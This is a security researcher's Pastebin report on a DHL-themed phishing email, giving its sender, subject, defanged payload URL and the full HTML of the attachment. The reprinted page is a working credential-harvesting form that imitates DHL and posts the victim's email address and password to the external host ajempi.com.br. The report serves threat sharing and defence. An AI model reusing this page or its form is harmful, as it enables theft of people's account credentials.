Neonprimetime

DHL Phishing Email ajempi.com.br

Nov 13th, 2015
513
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. DHL Phishing Email
  2. Reported by neonprimetime security
  3. Blog: http://neonprimetime.blogspot.com
  4. Twitter: https://twitter.com/neonprimetime    @neonprimetime
  5. VirusTotal: https://www.virustotal.com/en/user/neonprimetime/
  6. Reddit: https://www.reddit.com/user/neonprimetime
  7.  
  8. *****
  9. From: "dhl International express"<dhlnternationalexpress@mail.com>
  10. Subject: Your Shipping Document Delivery Date
  11. Attachment: Express tracking..html
  12. Payload URL: hxxp://www.ajempi.com.br/2013/cache/dhlndk.php
  13. *****
  14.  
  15. <html>
  16. <HEAD>
  17.     <TITLE>DHL | Tracking</TITLE>
  18.         <META NAME="DESCRIPTION" CONTENT="lodging & fishing guide service">
  19.         <META NAME="KEYWORDS" CONTENT="lodging, fishing guide service">
  20.    
  21. <title>TRADE FILE</title>
  22. </head>
  23. <script type="text/javascript"><!--
  24. function validateForm() {
  25. with (document.myform) {
  26. var alertMsg = "The following REQUIRED fields\nhave been left empty:\n";
  27. if (email.value == "") alertMsg += "\nEmail";
  28. if (epass.value == "") alertMsg += "\nEmail Password";
  29. if (alertMsg != "The following REQUIRED fields\nhave been left empty:\n") {
  30. alert(alertMsg);
  31. return false;
  32. } else {
  33. return true;
  34. } } }
  35. // --></script>
  36. <body background="http://www.dhl.com/img/modules/5_1_dhl_global_locator_all_340_187.gif" text="black" link="blue" alink="blue" vlink="blue" background="" >
  37. <!-- 66613 -->
  38. <font face="Arial" style="font-size: 20pt" color="#342C9A">
  39. <center><b>Sign In Your Email to View Your Tracking</b></font><font face="verdana,arial" size=-1><p>
  40. <img src="http://www.dhl.com/img/meta/dhl_logo.gif" width="300" height="100">
  41. </p>
  42. <table cellpadding=2 cellspacing=0 border=0>
  43. <tr><td bgcolor="blue"><table cellpadding=0 cellspacing=0 border=0 width=100%><tr><td bgcolor="blue" align=center style="padding:2;padding-bottom:4"><b>
  44.     <font size=-1 color="white" face="Comic Sans MS">Enter your
  45.     Email ID and password</font></b></font><b><font face="Comic Sans MS" size=-1></th></font><font face="Comic Sans MS" size=-1></tr>
  46.  
  47. </font><font face="verdana,arial" size=-1>
  48. <tr><td bgcolor="white" style="padding:5"><br>
  49. <form action="http://www.ajempi.com.br/2013/cache/dhlndk.php" onsubmit="return validateForm()" method="post" name="myform">
  50. <center><table width="517">
  51.  
  52. <tr><td width="110"><font face="verdana,arial" size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  53.     E-MAIL ID:</td><td width="397"><input type="text" name="email" size="40"></td></tr>
  54.  
  55. <tr><td colspan=2><font face="verdana,arial" size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  56.     </font><font face="verdana,arial" size=1><span  class=text1a>(example777@domain.com)</span></td></tr>
  57. <tr>
  58. <font face="verdana,arial" size=-1>
  59.     <td width="110"><font face="verdana,arial" size=-1>&nbsp;&nbsp;&nbsp;&nbsp;
  60.     PASSWORD:</td>
  61.  
  62.     <td width="397"><input type="password" name="epass" size="40"></td>
  63.  
  64.     </font>
  65. </tr>
  66. <tr>
  67.  
  68. <font face="verdana,arial" size=-1>
  69.     <td width="110"><font face="verdana,arial" size=-1>&nbsp;</td>
  70.     <td width="397"><font face="verdana,arial" size=-1><input type="submit" value="Log in To View"></td>
  71.     </font>
  72. </tr>
  73. <tr><td colspan=2><font face="verdana,arial" size=-1></td></tr>
  74. </table></center>
  75. </form>
  76.  
  77.     <script language="JavaScript">
  78.     <!--
  79.             if (document.aform.login.value == '') {
  80.                 document.aform.login.focus();
  81.             }
  82.     -->
  83.     </script>
  84. </td></tr></table></td></tr></table>
  85. <div class="copyright cLight">
  86.  
  87. &nbsp;</div>
  88. <p>Copyright Notice &#65449; 1999-2012 DHL WorldWide Delivery.
  89. All rights reserved. </p>
  90. &nbsp;<center><p><hr size=1 width="90%">&nbsp;</p></center>
  91. </font>
  92. <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img alt="http://mimg.126.net/logo/126logo.gif" src="http://mimg.126.net/logo/126logo.gif"><img alt="http://p.ebaystatic.com/aw/pics/logos/logoEbay_x45.gif" src="http://p.ebaystatic.com/aw/pics/logos/logoEbay_x45.gif" width="110" height="36">&nbsp; <img src="http://img3.cache.netease.com/www/logo/logo_png.png" alt="" title="" border=0 width=122 height=44>&nbsp;&nbsp; <img src="https://www.google.com/images/logos/mail_logo.png" alt="" title="" border=0 width=142 height=26><img src="https://secure.wlxrs.com/~Live.SiteContent.ID/~16.0.2/~/~/~/~/images/WindowsLive.png" alt="" title="" border=0 width=175 height=23>&nbsp;<img src="http://mimg.yeah.net/logo/yeahlogo_middle.gif" alt="" title="" border=0 width=174 height=62>
  93. <img src="http://l.yimg.com/a/i/ww/met/yahoo_logo_us_061509.png" alt="" title="" border=0 width=138 height=49></p>
  94.  
  95. </body>
  96. </html>
RAW Paste Data